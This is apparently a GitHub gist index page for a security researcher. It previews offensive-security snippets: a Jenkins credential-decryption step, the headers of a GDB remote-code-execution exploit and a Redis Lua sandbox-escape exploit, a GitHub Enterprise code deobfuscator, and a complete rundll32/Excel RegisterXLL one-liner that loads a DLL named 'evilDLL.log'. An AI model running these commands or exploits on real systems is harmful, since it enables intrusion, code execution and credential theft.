orangetw
/ all.txt
Created
September 7, 2018 14:36
— forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
View all.txt
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
orangetw
/ jenkins-decrypt.groovy
Created
August 4, 2017 07:31
— forked from tuxfight3r/jenkins-decrypt.groovy
Decrypting Jenkins Password
View jenkins-decrypt.groovy
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #To Decrypt Jenkins Password from credentials.xml | |
| #<username>jenkins</username> | |
| #<passphrase>your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J</passphrase> | |
| #go to the jenkins url | |
| http://jenkins-host/script | |
| #In the console paste the script | |
| hashed_pw='your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J' |
orangetw
/ w3rmup.php
Created
December 5, 2021 13:47
View w3rmup.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (!isset($_GET['mail'])) | |
| highlight_file(__FILE__) && exit(); | |
| $mail = filter_var($_GET['mail'], FILTER_VALIDATE_EMAIL); | |
| $addr = filter_var($_SERVER['REMOTE_ADDR'], FILTER_VALIDATE_IP); | |
| $country = geoip_country_code_by_name($addr); | |
| if (!$addr || strlen($addr) == 0) die('bad addr'); | |
| if (!$mail || strlen($mail) == 0) die('bad mail'); |
orangetw
/ pwn_gdb.py
Created
August 31, 2015 15:09
Remote Code Execution on GDB Remote Debugging Protocol
View pwn_gdb.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # coding: UTF-8 | |
| # | |
| import sys | |
| import gdb | |
| import socket | |
| import struct | |
| import binascii | |
| DEBUG = False |
orangetw
/ introspection-query.graphql
Created
September 21, 2018 03:42
— forked from craigbeck/introspection-query.graphql
Introspection query for GraphQL
View introspection-query.graphql
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| query IntrospectionQuery { | |
| __schema { | |
| queryType { name } | |
| mutationType { name } | |
| subscriptionType { name } | |
| types { | |
| ...FullType | |
| } | |
| directives { |
View nanana.xxd
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............ | |
| 0000010: 0200 3e00 0100 0000 2008 4000 0000 0000 ..>..... .@..... | |
| 0000020: 4000 0000 0000 0000 c811 0000 0000 0000 @............... | |
| 0000030: 0000 0000 4000 3800 0900 4000 1c00 1b00 ....@.8...@..... | |
| 0000040: 0600 0000 0500 0000 4000 0000 0000 0000 ........@....... | |
| 0000050: 4000 4000 0000 0000 4000 4000 0000 0000 @.@.....@.@..... | |
| 0000060: f801 0000 0000 0000 f801 0000 0000 0000 ................ | |
| 0000070: 0800 0000 0000 0000 0300 0000 0400 0000 ................ | |
| 0000080: 3802 0000 0000 0000 3802 4000 0000 0000 8.......8.@..... | |
| 0000090: 3802 4000 0000 0000 1c00 0000 0000 0000 8.@............. |
orangetw
/ ruby_revealer.sh
Created
December 25, 2016 20:48
— forked from geoff-nixon/ruby_revealer.sh
View ruby_revealer.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/sudo sh | |
| ## ruby_revealer.sh -- decrypt obfuscated GHE .rb files. 2.0.0 to 2.3.1+. | |
| ## From `strings ruby_concealer.so`: | |
| ## | |
| ## > This obfuscation is intended to discourage GitHub Enterprise customers | |
| ## > from making modifications to the VM. | |
| ## | |
| ## Well, good, as long as its not intended to discourage *me* from doing this! |
orangetw
/ excel.bat
Created
July 22, 2017 10:17
— forked from ryhanson/ExcelXLL.md
Execute DLL via the Excel.Application object's RegisterXLL() method
View excel.bat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REM rundll32 mshtml.dll HTA one-liner command: | |
| rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close(); |
orangetw
/ redis-lua-linux-x86-poc.py
Created
February 12, 2019 15:43
— forked from c3c/redis-lua-linux-x86-poc.py
Redis Lua 5.1 sandbox escape 32-bit Linux exploit
View redis-lua-linux-x86-poc.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Redis Lua 5.1 sandbox escape 32-bit Linux exploit | |
| ## Original exploit by corsix and sghctoma | |
| ## Author: @c3c | |
| ## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode | |
| ## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486 | |
| ## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different | |
| ## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf | |
| ## This code is much the same, except the process is done using pwntools' DynELF | |
| ## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version |
orangetw
/ ntlmdecoder.py
Created
May 21, 2021 09:20
— forked from aseering/ntlmdecoder.py
NTLM auth-string decoder
View ntlmdecoder.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| ## Decodes NTLM "Authenticate" HTTP-Header blobs. | |
| ## Reads the raw blob from stdin; prints out the contained metadata. | |
| ## Supports (auto-detects) Type 1, Type 2, and Type 3 messages. | |
| ## Based on the excellent protocol description from: | |
| ## <http://davenport.sourceforge.net/ntlm.html> | |
| ## with additional detail subsequently added from the official protocol spec: | |
| ## <http://msdn.microsoft.com/en-us/library/cc236621.aspx> | |
| ## |
NewerOlder